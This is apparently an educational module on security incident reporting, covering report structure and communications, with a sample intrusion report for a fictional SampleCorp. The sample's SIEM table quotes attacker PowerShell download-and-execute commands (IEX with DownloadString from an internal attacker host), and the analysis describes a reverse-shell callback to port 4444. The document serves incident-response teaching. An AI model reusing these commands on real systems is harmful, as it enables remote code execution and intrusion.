Security Incident Reporting

Introduction to Security Incident Reporting

In today's landscape, the question isn't whether a security incident will transpire, but rather when it will occur. Enterprises, governmental bodies, and individual users have grown exceedingly dependent on technology, which serves as the cornerstone for the vast majority of our activities.

While this technological advancement has augmented operational efficiency, revenue generation, and output, it has concomitantly escalated the associated risks. These technological platforms have become fertile grounds for malevolent actors, sponsored by both state and non-state entities. A meticulously designed and streamlined incident reporting mechanism is pivotal for any organization's preparedness to counter these emerging threats effectively.

Security incident reporting serves as a conduit between the identification and remediation of threats. It facilitates the archival of past incidents, thereby providing an invaluable repository for lessons learned from previous mistakes. This repository can be seamlessly integrated into a broader strategy for preempting and mitigating future threats. Given the perpetually evolving threat landscape, a comprehensive and consistent incident reporting framework is indispensable for ensuring that organizations and their workforce are optimally prepared for any contingencies.

Beyond merely reacting to threats, an efficacious reporting protocol also fulfills other internal organizational imperatives. Whether it's legal departments ensuring regulatory compliance, executive management assessing risk profiles, or CFOs evaluating financial repercussions, a well-structured incident report serves as a clarifying instrument for all stakeholders.

Effective incident reporting should strike a balance between granularity and accessibility, making it comprehensible to both technically savvy and non-technical audiences. This module's objective is to refine your grasp of the nuances involved in proficient incident reporting.

Incident Identification and Categorisation

Navigating the labyrinthine array of cybersecurity threats that could potentially impact you or your organization necessitates a methodical approach to identifying and classifying security incidents. This enables the rapid allocation of resources and expedites threat mitigation. Essentially, the cornerstone of an initial successful response to an incident lies in the capability to promptly identify and categorize the threat.

Identifying Security Incidents

Security incidents can emanate from a diverse array of sources and often manifest as detections, anomalies, or deviations from established baselines. There are primarily three key sources for incident identification:

Source Description
Security Systems/Tooling in Place There is a wide variety of security systems and tools likely in place within your organization. Some excellent sources for identification include IDS/IPS, EDR/XDR, SIEM tools, or even basic anti-virus alerts and NetFlow data.
Human Observations Users may notice and report suspicious activities, unusual emails, or systems behaving abnormally.
Third Party Notifications Partners, vendors, or even customers might inform organizations about any vulnerabilities or breaches they are experiencing.

Categorising Security Incidents

Upon identification of an incident, it is imperative to categorize it to facilitate the prioritization and allocation of resources for an effective response. This categorization also aids in comprehending the nature of the incident, thereby informing subsequent briefings to stakeholders.

Examples of Incident Types:

Incident Severity Levels:

It's crucial to recognize that incidents frequently straddle multiple categories and can dynamically shift in both category and severity as additional intelligence is garnered during the analysis phase. The fluid nature of these threats mandates a flexible yet structured approach to both identification and categorization.

Conclusion

In summary, adept identification and categorization constitute the bedrock of any proficient Security Operations Center (SOC). These processes dictate the alacrity, precision, and effectiveness of the response measures, and consequently, the mitigation strategies.

The Incident Reporting Process

The reporting process serves as the cohesive framework that binds all elements of security incident reporting. An effective, overarching reporting mechanism delivers not just clarity and direction, but also highly actionable insights. In this section, we'll dissect the requisite steps within this process.

1. Initial Detection & Acknowledgement

Before any incident can be formally reported, it must first be detected and acknowledged. Detection vectors can vary, ranging from human observation to automated alerts generated by deployed security tools. In some cases, the threat actor themselves may trigger the detection, especially if you're dealing with a ransomware incident.

2. Preliminary Analysis

During this phase, the scope and potential ramifications of the security incident must be ascertained. The incident should be categorized based on our previously established classification and severity metrics.

3. Incident Logging

Every facet, action, and observation related to the security incident should be meticulously logged using an established system. Popular platforms for this purpose include JIRA and TheHive Project. In the absence of such a system, alternative methods should be employed. Even rudimentary tools like pen and paper or a spreadsheet can suffice in a pinch.

4. Notification of Relevant Parties

Stakeholders must be promptly identified, and notifications should be segmented into:

5. Detailed Investigation & Reporting

The duration of this phase can vary significantly, ranging from a couple of days to potentially years. What's crucial here is a comprehensive technical analysis coupled with a compilation of all findings. This in-depth investigation is vital for understanding the incident's full impact.

6. Final Report Creation

The culmination of your role as a security analyst or incident responder is the creation of a finalized incident report. This document will furnish regulators, insurers, and executive leadership with a detailed account of the incident, its origins, and the remedial actions taken.

7. Feedback Loop!

Post-incident reflection is essential for enhancing our preparedness for future incidents. This involves revisiting and analyzing the incident to identify areas for improvement.

Conclusion

Far from being a mere procedural formality, the reporting process is a strategic asset that enhances an organization's resilience against security threats. Through rigorous documentation, analysis, and learning from each incident, organizations can convert challenges into opportunities for bolstering their security stance.

Elements of a Proper Incident Report

Executive Summary

Let's consider the Executive Summary as the gateway to our report, designed to cater to a broad audience, including non-technical stakeholders. This section should furnish the reader with a succinct overview, key findings, immediate actions executed, and the impact on stakeholders. Since many stakeholders may only peruse the Executive Summary, it's imperative to nail this section. Here's a more granular breakdown of what should be encapsulated in the Executive Summary:

Section Description
Incident ID Unique identifier for the incident.
Incident Overview Provide a concise summary of the incident's events (including initial detection) and explicitly state its type. Was it a ransomware attack, a large-scale data breach, or both? This should also encompass the estimated time and date of the incident, as well as its duration, the affected systems/data, and the status (ongoing, resolved, or escalated)
Key Findings Enumerate any salient findings that emerged from the incident. What was the root cause? Was a specific CVE exploited? What data, if any, was compromised, exfiltrated, or jeopardized?
Immediate Actions Taken Outline the immediate response measures taken. Were the affected systems promptly isolated? Was the root cause identified? Did we engage any third-party services, and if so, who were they?
Stakeholder Impact Assess the potential impact on various stakeholders. For instance, did any customers experience downtime, and what are the financial ramifications? Was employee data compromised? Was proprietary information at risk, and what are the potential repercussions?

Technical Analysis

This section is where we dive deeply into the technical aspects, dissecting the events that transpired during the incident. It's likely to be the most voluminous part of the incident report. The following key points should be addressed:

Affected Systems & Data

Highlight all systems and data that were either potentially accessed or definitively compromised during the incident. If data was exfiltrated, specify the volume or quantity, if ascertainable.

Evidence Sources & Analysis

Emphasize the evidence scrutinized, the results, and the analytical methodology employed. For instance, if a compromise was confirmed through web access logs, include a screenshot for documentation. Maintaining evidence integrity is crucial, especially in criminal cases. A best practice is to hash files to ensure their integrity.

Indicators of Compromise (IoCs)

IoCs are instrumental for hunting potential compromises across our broader environment or even among partner organizations. It might also be feasible to attribute the attack to a specific threat group based on the IoCs identified. These can range from abnormal outbound traffic to unfamiliar processes and scheduled tasks initiated by the attacker.

Root Cause Analysis

Within this section, detail the root cause analysis conducted and elaborate on the underlying cause of the security incident (vulnerabilities exploited, failure points, etc.).

Technical Timeline

This is a pivotal component for comprehending the incident's sequence of events. The timeline should include:

Nature of the Attack

Deep-dive into the type of attack, as well as the tactics, techniques, and procedures (TTPs) employed by the attacker.


Impact Analysis

Provide an evaluation of the adverse effects that the incident had on the organization's data, operations, and reputation. This analysis aims to quantify and qualify the extent of the damage caused by the incident, identifying which systems, processes, or data sets have been compromised. It also assesses the potential business implications, such as financial loss, regulatory penalties, and reputational damage.


Response and Recovery Analysis

Outline the specific actions taken to contain the security incident, eradicate the threat, and restore normal operations. This section serves as a chronological account of the measures implemented to mitigate the impact and prevent future occurrences of similar incidents.

Here's a breakdown of what the "Response and Recovery" section typically includes:

Immediate Response Actions

Revocation of Access

Containment Strategy

Eradication Measures

Malware Removal

System Patching

Recovery Steps

Data Restoration

System Validation

Post-Incident Actions

Monitoring

Lessons Learned


Diagrams

Given that the narrative can become exceedingly complex, visual aids can be invaluable for simplifying the incident's intricacies:


Appendices

This section serves as a repository for supplementary material that provides additional context, evidence, or technical details that are crucial for a comprehensive understanding of the incident, its impact, and the response actions taken. This section is often considered the backbone of the report, offering raw data and artifacts that can be independently verified, thus adding credibility and depth to the narrative presented in the main body of the report.

The Appendices section may include:


Best Practices


Conclusion

A meticulously crafted incident report is non-negotiable following a security breach or attack. These reports offer an exhaustive analysis of what went awry, what measures were effective, the reasons behind them, and future preventive strategies.

Communications

In the midst of any crisis, effective communication is not just beneficial but crucial. The stakes are even higher during a security incident, where transparency, coordinated response efforts, and trust-building with stakeholders are paramount.

Let's dissect the various facets of communications and highlight some key components.

Importance of Effective Communications

The significance of adept communications is multi-faceted and can be segmented into the following categories:

Stakeholder Trust

Transparent and coherent communication is instrumental in preserving stakeholder trust throughout an incident. It serves as a testament to an organization's responsibility, transparency, and command over the situation.

Coordination & Efficiency

Alignment among all parties involved is especially vital. A cybersecurity incident is not an isolated event affecting only the technical team; it has broader organizational implications. Keeping everyone on the same page is not just advisable but essential.

Regulatory Compliance

It's imperative to cross-verify the regulatory compliance mandates specific to your organization. These guidelines should be explicitly documented in your Incident Response Plan (IRP).


Internal Communications

While often sidelined, internal communications are pivotal for conveying a consistent message across the organization. This becomes increasingly important in the event of information leaks, which are not uncommon within corporate settings. Let's look at some key elements of internal communications:

Immediate notification

Upon acknowledgment of an incident, stakeholders must be promptly informed.

Regular Updates

Consistent, periodic briefings should be disseminated to all involved teams. This ensures a shared understanding of the incident's status, its potential ramifications, and any pending actions.

Feedback Loop

A feedback loop should be established as a conduit for teams to exchange findings, voice concerns, or offer suggestions.


External Communications

External communications are equally critical and often encompass a diverse array of third parties, from customers to governmental agencies and regulatory bodies. Navigating this landscape requires finesse and careful planning. Here are some key aspects to consider:

Affected Parties

Direct communication should be established with any parties impacted by the incident, be they customers, clients, or business partners.

Public Statement

For incidents of significant scale, a public statement may be warranted. Such a statement should be lucid and steer clear of overly technical jargon to prevent confusion among customers and other third parties.

Regulatory Bodies

Depending on your jurisdiction and the nature of the incident, you may be obligated to notify regulatory entities like the Information Commissioner's Office (ICO) within a stipulated timeframe.


When we're hit with a cybersecurity incident, the way we communicate becomes a linchpin for both our security posture and our compliance standing. Let's dissect the technical landscape of these communication channels and their intertwined implications.

  1. Security Dimensions of Communication Channels:
    • Encryption: We must ensure that every piece of information we share is wrapped in robust end-to-end encryption. This is non-negotiable, especially when we're discussing the nitty-gritty of the incident, like which systems took a hit or which vulnerabilities got exploited.
    • Authentication and Authorization: Access to our communication channels should be as tight as Fort Knox. We can't stress enough the importance of multi-factor authentication (MFA) to double-check the identities of those trying to access the channel.
    • Data Integrity: We need to be certain that our messages remain unaltered during transit. Cryptographic hashing techniques can be our best bet to ensure the integrity of our communications.
    • Ephemeral Communications: For those top-secret discussions, we might consider using messaging platforms that auto-destruct messages post-reading. This minimizes the risk of any prying eyes accessing our sensitive data later on.
    • Air-Gapped Communications: In situations where we suspect our primary communication backbone might be under threat, we might need to resort to air-gapped systems. These systems are our last line of defense, completely isolated from other potentially compromised networks.
  2. Regulatory Dimensions of Communication Channels:
    • Data Privacy Laws: We're operating in a world where data privacy regulations, like the EU's GDPR, hold significant sway. If we're discussing or sharing personal data, especially of EU residents, we need to toe the line with GDPR mandates.
    • Breach Notification Mandates: Certain jurisdictions have clear-cut timelines for breach notifications. We need to be aware of these when communicating about data breaches, ensuring we're not only timely but also adhering to the content guidelines set by these laws.
    • Record-Keeping: While we might lean towards ephemeral messages for security, some regulations mandate a clear record of all incident-related communications. It's a tightrope walk, but we need to find that balance.
    • Cross-Border Communications: When our incident spills over national borders, the communication game changes. Some nations have stringent data sovereignty laws, dictating the hows and wheres of data transmission and storage.
    • Chain of Custody: If there's even a hint that legal actions might follow the incident, we need to maintain an unbroken chain of custody for all communications. This ensures that if we need to present evidence in court, it's deemed admissible.

Real-world Incident Report

Executive Summary

Technical Analysis

Affected Systems & Data

Owing to insufficient network access controls, the unauthorized entity was assigned an internal IP address by simply connecting their computer to an Ethernet port within a SampleCorp office.

The unauthorized entity successfully gained control over the following nodes within SampleCorp's infrastructure:

Evidence Sources & Analysis

WKST01.samplecorp.com

On the night of April 22, 2019, at exactly 01:05:00, SampleCorp's Security Operations Center (SOC) identified unauthorized activity within the internal network. This was detected through abnormal parent-child process relationships and suspicious PowerShell commands, as displayed in the following screenshot.

From the logs, PowerShell was invoked from cmd.exe to execute the contents of a remotely hosted script. The IP address of the remote host was an internal address, 192.168.220.66, indicating that an unauthorized entity was already present within the internal network.

The earliest signs of malicious command execution point to WKST01.samplecorp.com being compromised, likely due to a malicious email attachment with a suspicious file named cv.pdf for the following reasons:

Additionally, cmd.exe and powershell.exe were spawned from wmiprvse.exe.

As already mentioned, the unauthorized entity then executed specific PowerShell commands.

Brief Analysis of 192.168.220.66

From the logs, we identified four hosts on the network segment with corresponding IP addresses and hostnames. The host 192.168.220.66, previously observed in the logs of WKST01.samplecorp.com, confirms the presence of an unauthorized entity in the internal network.

IP Hostname
192.168.220.20 DC01.samplecorp.com
192.168.220.200 WKST01.samplecorp.com
192.168.220.101 HR01.samplecorp.com
192.168.220.202 ENG01.samplecorp.com

The below table is the result of a SIEM query that aimed to identify all instances of command execution initiated from 192.168.220.66, based on data from WKST01.samplecorp.com.

event_data.CommandLine.keyword: Descending beat.hostname.keyword: Descending Count
cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1555864304.02 2>&1 WKST01 5
cmd.exe /Q /c dir 1> \\127.0.0.1\ADMIN$\__1555864304.02 2>&1 WKST01 4
powershell.exe -nop -w hidden -c $c=new-object net.webclient;$c.proxy=[Net.WebRequest]::GetSystemWebProxy();$c.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX WKST01 2
whoami WKST01 1
... ... ...
powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.220.66/test.php'); $m = Get-ModifiableService; $m HR01 1

The results suggest that the unauthorized entity has successfully infiltrated the hosts: WKST01.samplecorp.com and HR01.samplecorp.com.

HR01.samplecorp.com

HR01.samplecorp.com was investigated next, as the unauthorized entity, 192.168.220.66, was shown to establish a connection with HR01.samplecorp.com at the earliest possible moment in the packet capture.

Network traffic details suggest a buffer overflow attempt on the service running at port 31337 of HR01.samplecorp.com.

The network traffic was exported as raw binary for further analysis.

The extracted binary was analyzed in a shellcode debugger, scdbg.

Scdbg reveals that the shellcode will attempt to initiate a connection to 192.168.220.66 at port 4444. This confirms that there has been an attempt to exploit a service running on port 31337 of HR01.samplecorp.com.

A search for network connections between HR01.samplecorp.com and the unauthorized entity was conducted using the aforementioned traffic capture file. Results revealed connections back to the unauthorized entity on port 4444. This indicates that the unauthorized entity successfully exploited a buffer overflow vuln to gain command execution on HR01.samplecorp.com.

The depth of the technical analysis can be tailored to ensure that all stakeholders are adequately informed about the incident and the actions taken in response. While we've chosen to keep the investigation details concise in this module to avoid overwhelming you, it's important to note that in a real-world situation, every claim or statement would be backed up with robust evidence.

Indicators of Compromise (IoCs)

Root Cause Analysis

Insufficient network access controls allowed the unauthorized entity access to SampleCorp's internal network.

The primary catalysts for the incident were traced back to two significant vulnerabilities. The first vulnerability stemmed from the continued use of an outdated version of Acrobat Reader, while the second was attributed to a buffer overflow issue present within a proprietary application. Compounding these vulnerabilities was the inadequate network segregation of crucial systems, leaving them more exposed and easier targets for potential threats. Additionally, there was a notable gap in user awareness, evident from the absence of comprehensive training against phishing tactics, which could have served as the initial entry point for the attackers.

Technical Timeline

Nature of the Attack

In this segment, we should meticulously dissect the modus operandi of the unauthorized entity, shedding light on the specific tactics, techniques, and procedures (TTPs) they employed throughout their intrusion. For instance, let's dive into the methods the SOC team used to determine that the unauthorized entity utilized the Metasploit framework in their operations.

Detecting Metasploit

To better understand the tactics and techniques of the unauthorized entity, we delved into the malicious PowerShell commands executed.

Particularly, the one shown in the following screenshot.

Upon inspection, it became clear that double encoding was used, likely as a means to bypass detection mechanisms. The SOC team successfully decoded the malicious payload, revealing the exact PowerShell code executed within the memory of WKST01.samplecorp.com.

By leveraging open source intelligence, our SOC team determined that this PowerShell code is probably linked to the Metasploit post-exploitation framework.

To support our hypothesis that Metasploit was used, we dived deeper into the detected shellcode. We specifically exported the packet bytes containing the shellcode (as a.bin) and subsequently submitted them to VirusTotal for evaluation.

The results from VirusTotal affirmed our suspicion that Metasploit was in play. Both metacoder and shikata are intrinsically linked to the Metasploit-generated shellcode.


Impact Analysis

In this segment, we should dive deeper into the initial stakeholder impact analysis presented at the outset of this report. Given the company's unique internal structure, business landscape, and regulatory obligations, it's crucial to offer a comprehensive evaluation of the incident's implications for every affected party.


Response and Recovery Analysis

Immediate Response Actions

Revocation of Access

Containment Strategy

Eradication Measures

Malware Removal

System Patching

Recovery Steps

Data Restoration

System Validation

Post-Incident Actions

Monitoring

Lessons Learned


Annex A

Technical Timeline

Time Activity
April 22nd, 2019, 00:27:27 One of the employees opened a malicious PDF document (cv.pdf) on WKST01.samplecorp.com, which exploited a known vulnerability in an outdated version of Acrobat Reader. This led to the execution of a malicious payload that established initial foothold on the system.
April 22nd, 2019, 00:35:09 The unauthorized entity accessed various directories on WKST01.samplecorp.com containing both proprietary source code and API keys.
April 22nd, 2019, 00:50:18 The unauthorized entity leveraged the initial access to perform reconnaissance on the internal network. They discovered a buffer overflow vulnerability in a proprietary HR application running on HR01.samplecorp.com. Using a crafted payload, they exploited this vulnerability to gain unauthorized access to the HR system.
April 22nd, 2019, 01:30:12 The unauthorized entity located an unencrypted database on HR01.samplecorp.com containing sensitive employee and partner data, including Social Security numbers and salary information. They compressed this data and exfiltrated it to an external server via a secure SSH tunnel.
April 22nd, 2019, 02:30:11 SampleCorp's SOC and DFIR teams detected the unauthorized activities and immediately isolated WKST01.samplecorp.com and HR01.samplecorp.com from the network using VLAN segmentation.
April 22nd, 2019, 03:10:14 SampleCorp's SOC and DFIR teams plugged a host security solution to both WKST01.samplecorp.com and HR01.samplecorp.com to collect more data from the affected systems.
April 22nd, 2019, 03:43:34 The firewall rules were updated to block the known C2 IP address, effectively cutting off the unauthorized entity's remote access.
April 22nd, 2019, 04:11:00 A specialized malware removal tool was used to clean both WKST01.samplecorp.com and HR01.samplecorp.com of the deployed malware.
April 22nd, 2019, 04:30:00 All systems, starting with WKST01.samplecorp.com were updated to the latest version of Acrobat Reader, mitigating the vulnerability that led to the initial compromise.
April 22nd, 2019, 05:01:08 The API keys that were accessed by the unauthorized entity have been revoked.
April 22nd, 2019, 05:05:08 The login credentials of the user who accessed the cv.pdf file, as well as those of users who have recently signed into both WKST01.samplecorp.com and HR01.samplecorp.com, have been reset.
April 22nd, 2019, 05:21:20 After ensuring that WKST01.samplecorp.com was malware-free, the SOC team restored the system from a verified backup.
April 22nd, 2019, 05:58:50 After ensuring that HR01.samplecorp.com was malware-free, the SOC team restored the system from a verified backup.
April 22nd, 2019, 06:33:44 The development team rolled out an emergency patch for the buffer overflow vulnerability in the proprietary HR application, which was then deployed to HR01.samplecorp.com.